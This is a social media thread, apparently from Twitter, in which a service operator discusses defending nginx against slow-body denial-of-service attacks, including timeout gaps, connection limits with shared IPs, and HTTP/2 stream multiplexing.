Conversation

We've had to start hardening our services against increasingly frequent Denial of Service (DoS) attacks. OVH provides DDoS mitigation, but this a smaller scale problem. Unfortunately, nginx lacks some important configuration options and some others are specific to NGINX Plus.
1
7
Setting client_body_timeout to 15s won't time out a client sending 1 byte every 10s. There's no timeout for receiving the whole body. Only permitting tiny request bodies helps but isn't always an option. There's no way to timeout based on a minimum rate or even the total time.
1
1
blog.cloudflare.com/the-curious-ca is a post about the interaction between send timeouts and buffering. It's not quite the same thing and buffer bloat mitigations may partially address it. Still, it shows how this approach to timeouts based on time between system calls doesn't work well.
1
2
Replying to
client_header_timeout is the whole header portion but the body following it doesn't have a comparable setting and appears to be what gets abused. We're using nginx's support for limiting connections right now but we can't be that strict in a normal situation due to shared IPs.
1
Replying to and
Carrier-grade NAT, VPNs, etc. mean that many users can be behind a single IP. Also, HTTP < 2 opens a lot of connections for each user while HTTP > 1 multiplexes streams and can create a lot of concurrent work with a single connection so nginx's limit treats each stream as a conn.
2
Replying to
A user could use multiple browsers, etc. There are a lot of ways of legitimately going over that. The HTTP/2 standard recommends permitting 100 streams by default so a single HTTP/2 connection can trigger an insane amount of work. nginx layer limit is needed to deal with that.
1
Replying to and
That doesn't help much because it gets exhausted very slowly with a single byte written at a regular heartbeat for each connection that's enough to keep it from timing out. Lowering timeout will force increasing the heartbeat but that doesn't really seem to make much difference.
1
Replying to and
The upstream server inherently has to do some CPU-bound work alongside reading and writing to a database. It needs a threaded server model and wouldn't be well suited to async. I need to choose the best available server for it and port to that but I wouldn't expect a miracle.
1
Show replies